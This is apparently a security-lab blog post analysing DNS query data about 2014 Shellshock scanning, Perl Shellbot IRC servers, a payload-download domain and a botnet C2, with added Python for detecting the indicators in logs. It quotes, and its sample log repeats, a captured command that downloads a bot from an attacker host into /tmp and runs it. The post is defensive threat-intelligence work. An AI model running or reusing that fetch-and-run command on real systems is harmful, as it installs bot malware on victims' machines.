How OpenDNS Labs Sees the BASH Vulnerability

Security Research Team
Updated — September 15, 2021 • 4 minute read

There have been many blog posts, tweets, and even a few webinars already scheduled to talk about the massive patch-forcing BASH vulnerability – more commonly known as “Shellshock”. OpenDNS Security Labs thought long and hard about how we would respond and decided that, in the best interest of the security community, we wouldn’t simply rehash what everyone else was saying. Instead, we decided to look at the queries made on our global infrastructure to see what observations could be made.

For background on the Shellshock vulnerability we recommend visiting:

  • /2014/09/26/bash-shellshock-security-need-know/
  • http://www.csoonline.com/article/2688716/vulnerabilities/attacks-against-shellshock-continue-as-updated-patches-hit-the-web.html
  • http://threatpost.com/bash-exploit-reported-first-round-of-patches-incomplete/108550

The Data

With the help of numerous sources, including our friends at AlienVault, ThreatStream, and Akamai in addition to individuals such as @lbhuston, @achillean, @dkulshitsky, and @nickschroedl, among others, we were able to compile a list of Shellshock scanning IP addresses. This list, which can be found here, contains 1060 unique IP addresses, at the time this blog post was written, from countries all over the world.
As we began to look at the data, a question materialized: how many of these scans were from researchers vs. malicious actors…and how could we find out?
To begin with, we looked at the IP addresses from our scan data set and determined the ASN, CIDR, geographic location, and AS owners for each scanner IP. An IP-based geolocation map was generated and can be seen below.
Screenshot 2014-09-30 14.36.37
Looking at the scanning IP country of origin, the chart shown below represents the top talking countries, by ASN, with more than 10 identified IP-to-ASN mappings. As you can see, the majority of scans originated from France, Germany, The Netherlands, Italy, China, Great Britain, and the United States, in ascending order.
Country_of_origin_scans
For those scanning countries with fewer than 10 scans, there is a much more level count of scans-per-country.
Country_of_origin_scans_lower_bounds
Just hours after this vulnerability was reported, Perl Shellbot and bash-injected ELF malware were seen in the wild.
Aside from researchers scanning the entire Internet (looking at you @achillean and @ErrataRob), hobbyists, and script kiddies, we observed a huge surge in connections to two IRC servers whose addresses were hardcoded in several Perl Shellbot samples we (along with others) found on Pastebin.com. These IRC servers, us[.]bot[.]nu and fbi[.]bot[.]nu, are profiled below, as is another malicious payload downloader site.

Analysis – us[.]bot[.]nu

Screenshot 2014-09-29 15.16.17
Between September 25th, 2014 and October 2nd, 2014 we observed more than 3.2 million queries for this domain on our infrastructure, with the highest peak (602,295) occurring on September 27th at 01:00 UTC.
Screenshot 2014-10-02 08.36.16

Analysis – fbi[.]bot[.]nu

Screenshot 2014-09-29 15.18.17
Between September 25th, 2014 and October 2nd, 2014 we observed more than 2.5 million queries for this domain, with the highest peak (410,651) occurring on September 27th at 01:00 UTC.
Screenshot 2014-10-02 08.38.24

Analysis – Stablehost[.]us

A third domain has also been observed acting as a payload download site once a host has been found vulnerable to Shellshock. This site, stablehost[.]us, was already known to, and blocked by, OpenDNS back in January 2014, as it had been used to deliver the Fiesta exploit kit; it now appears to have been repurposed for payload delivery.
Screenshot 2014-10-02 10.16.25

Screenshot 2014-10-02 10.14.40
The following string was observed by numerous researchers and security professionals across various perimeter security controls. The command essentially fetches and runs another payload as part of the post-exploitation campaign:

/bin/bash -c "wget http://stablehost[.]us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot ; sh /tmp/sh;rm -rf /tmp/sh

Based on the sustained 1K query count, this is likely a string you should start reviewing your logs for.
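As an added illustration (this is not OpenDNS Labs' code), the following Python checks DNS query logs for the IRC and payload domains named in this post and scans web access logs for the fetch-and-run command quoted above. The log formats, client addresses and sample lines are constructed for the example.

```python
import re
from collections import Counter, defaultdict

# Indicator domains named in the post (defanged there, plain here).
IOC_DOMAINS = {"us.bot.nu", "fbi.bot.nu", "stablehost.us",
               "linksys.secureshellz.net", "advombat.ru"}

# The fetch-and-run sequence quoted in the post: bash -c, a wget/curl
# download into /tmp, then sh on that same dropped file. Kept loose so
# small changes in URL, file name or tool ordering still match.
FETCH_AND_RUN = re.compile(
    r"/bin/bash\s+-c\b.*?\b(?:wget|curl)\b.*?/tmp/(\S+?)\b.*?\bsh\s+/tmp/\1",
    re.DOTALL)

def is_ioc_domain(qname):
    """True if qname equals an IOC domain or is a subdomain of one."""
    q = qname.rstrip(".").lower()
    return any(q == d or q.endswith("." + d) for d in IOC_DOMAINS)

def scan_dns_log(lines):
    """Lines are 'timestamp client qname qtype'; returns {client: Counter(domain)}."""
    hits = defaultdict(Counter)
    for line in lines:
        fields = line.split()
        if len(fields) >= 3 and is_ioc_domain(fields[2]):
            hits[fields[1]][fields[2].rstrip(".").lower()] += 1
    return hits

def scan_web_log(lines):
    """(line_no, source_ip) for access-log lines carrying the fetch-and-run string."""
    return [(n, line.split()[0]) for n, line in enumerate(lines, 1)
            if FETCH_AND_RUN.search(line)]

# Constructed sample logs (not real traffic).
DNS_SAMPLE = """\
2014-09-27T01:00:01Z 192.0.2.10 us.bot.nu. A
2014-09-27T01:00:02Z 192.0.2.10 fbi.bot.nu. A
2014-09-27T01:00:03Z 192.0.2.11 www.example.com. A
2014-09-27T01:00:04Z 192.0.2.12 linksys.secureshellz.net. A
2014-09-27T01:00:05Z 192.0.2.10 us.bot.nu. A
""".splitlines()
WEB_SAMPLE = [
    '198.51.100.7 - - [26/Sep/2014:12:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [26/Sep/2014:12:00:05 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" '
    '"/bin/bash -c \\"wget http://stablehost.us/bots/regular.bot -O /tmp/sh; sh /tmp/sh; rm -rf /tmp/sh\\""',
]
```

Subdomain matching matters because the post's own data shows the C2 under a host name (linksys[.]secureshellz[.]net), not only the bare domain.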

Further Analysis

With all of that data, can we differentiate between researchers, script kiddies, and bots? The first two (researchers and script kiddies) are by far the most difficult to differentiate between <pause for laughter>. Let’s look at more findings and see…
Looking at day-over-day changes in activity between users who had been probing for the vulnerability on September 29th vs. the 30th, there were 118 more users on the 30th than on the 29th. Despite this sudden uptick in users, what was more interesting was the difference in traffic patterns between the two groups. More than 90% of the new Shellshock probers visited fewer than three suspicious websites. However, individuals who had visited malware sites on the 29th continued to visit malware sites at the same rate on the 30th. In fact, the malware rates and sites visited were almost identical, with a deviation of +/- 2. One guess is that the surge in new probers could be either security researchers or script kiddies, while the users who were probing on the 29th, and had high malware visitation rates, were probably already compromised machines.
Interestingly, only one malicious domain was found in common across all three datasets. The advombat[.]ru domain was found once in the Stablehost dataset and three times in both the September 29th and September 30th datasets. The advombat domain is connected with ransomware downloads, and its query history over the past month reveals that the domain receives approximately 15k queries per hour, with traffic activity following a diurnal pattern. This sort of behavior supports the hypothesis that machines probing for the Shellshock vulnerability on the 29th were part of a larger compromised network. A point of further investigation would be to analyze similarities in traffic between computers that have visited the advombat domain.
The stablehost[.]us dataset provided us with data regarding computers that were becoming part of a larger Shellshock botnet. The domain found most frequently across the set of 18 IPs was stablehost[.]us, with 17 occurrences. The second most common was linksys[.]secureshellz[.]net, with 8 occurrences.
Screenshot 2014-10-02 11.43.37
Secureshellz has been identified by researchers such as our friends over at @MalwareMustDie as one of the command-and-control (C2) servers for the Shellshock botnet. It was also previously known, and blocked, for serving the Fiesta Exploit Kit at the beginning of January 2014.
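To make the day-over-day comparison and the "17 of 18 IPs" prevalence count concrete, here is an added example (not OpenDNS Labs' code) over constructed DNS records. The prober sets, client addresses and suspicious-domain list are assumptions for the example; the day labels and numbers do not reproduce the post's data.

```python
from collections import Counter, defaultdict

# Constructed sample: (day, client_ip, queried_domain). Not real data.
RECORDS = [
    ("09-29", "10.0.0.1", "advombat.ru"), ("09-29", "10.0.0.1", "evil-a.test"),
    ("09-29", "10.0.0.1", "evil-b.test"), ("09-29", "10.0.0.2", "example.org"),
    ("09-30", "10.0.0.1", "advombat.ru"), ("09-30", "10.0.0.1", "evil-a.test"),
    ("09-30", "10.0.0.1", "evil-c.test"), ("09-30", "10.0.0.2", "example.org"),
    ("09-30", "10.0.0.3", "evil-a.test"), ("09-30", "10.0.0.4", "example.org"),
    ("09-30", "10.0.0.5", "example.org"),
]
SUSPICIOUS = {"advombat.ru", "evil-a.test", "evil-b.test", "evil-c.test"}
# Clients seen probing for Shellshock on each day (assumed, e.g. taken from
# the compiled scanner IP list joined against resolver client addresses).
PROBERS = {"09-29": {"10.0.0.1", "10.0.0.2"},
           "09-30": {"10.0.0.1", "10.0.0.2", "10.0.0.3", "10.0.0.4", "10.0.0.5"}}

def new_probers(probers, day1, day2):
    """Clients probing on day2 that were not probing on day1."""
    return probers[day2] - probers[day1]

def suspicious_sites(records, clients, day):
    """Number of distinct suspicious domains each client resolved on the day."""
    seen = defaultdict(set)
    for d, client, qname in records:
        if d == day and client in clients and qname in SUSPICIOUS:
            seen[client].add(qname)
    return {c: len(seen[c]) for c in clients}

def share_below(counts, threshold):
    """Fraction of clients that visited fewer than `threshold` suspicious sites."""
    return sum(1 for n in counts.values() if n < threshold) / len(counts)

def stable_visitors(records, clients, day1, day2, tolerance=2):
    """Returning clients whose suspicious-site count moved by at most +/- tolerance."""
    a = suspicious_sites(records, clients, day1)
    b = suspicious_sites(records, clients, day2)
    return {c for c in clients if abs(a[c] - b[c]) <= tolerance}

def domain_prevalence(records, clients):
    """How many of the given clients resolved each domain (the '17 of 18' view)."""
    per_domain = defaultdict(set)
    for _, client, qname in records:
        if client in clients:
            per_domain[qname].add(client)
    return Counter({q: len(cs) for q, cs in per_domain.items()})
```

Counting distinct clients per domain, rather than raw queries, is what keeps one noisy bot from dominating the prevalence ranking.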

In closing…

So it seems that looking at the data as we have done thus far has not really afforded us the visibility needed for the bot vs. human vs. infected human differentiation problem. OpenDNS Labs will continue to explore this in an upcoming blog post, as we have some interesting ideas on how to attack this particular problem and secure DNS servers against attack.
